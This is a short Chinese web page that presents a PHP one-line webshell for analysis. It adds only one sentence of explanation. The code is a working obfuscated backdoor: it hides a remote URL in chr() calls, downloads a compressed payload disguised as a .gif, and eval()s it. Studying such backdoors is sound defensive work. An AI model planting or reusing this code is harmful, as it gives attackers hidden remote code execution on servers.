首页 > 代码库 > 窥探一句话木马后门的背后
窥探一句话木马后门的背后
分析的木马后门:
<?php$password=‘vae‘;//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION[‘PhpCode‘])){$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);$get=chr(102).chr(105).chr(108).chr(101).chr(95);$get.=chr(103).chr(101).chr(116).chr(95).chr(99);$get.=chr(111).chr(110).chr(116).chr(101).chr(110);$get.=chr(116).chr(115);$_SESSION[‘PhpCode‘]=$get($url);}$un=$c(103).$c(122).$c(105).$c(110);$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(‘MTAx‘));@eval($un($_SESSION[‘PhpCode‘]));?>
判断如果session[‘Phpcode‘]为空的话执行七到十八行的代码。
窥探一句话木马后门的背后
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。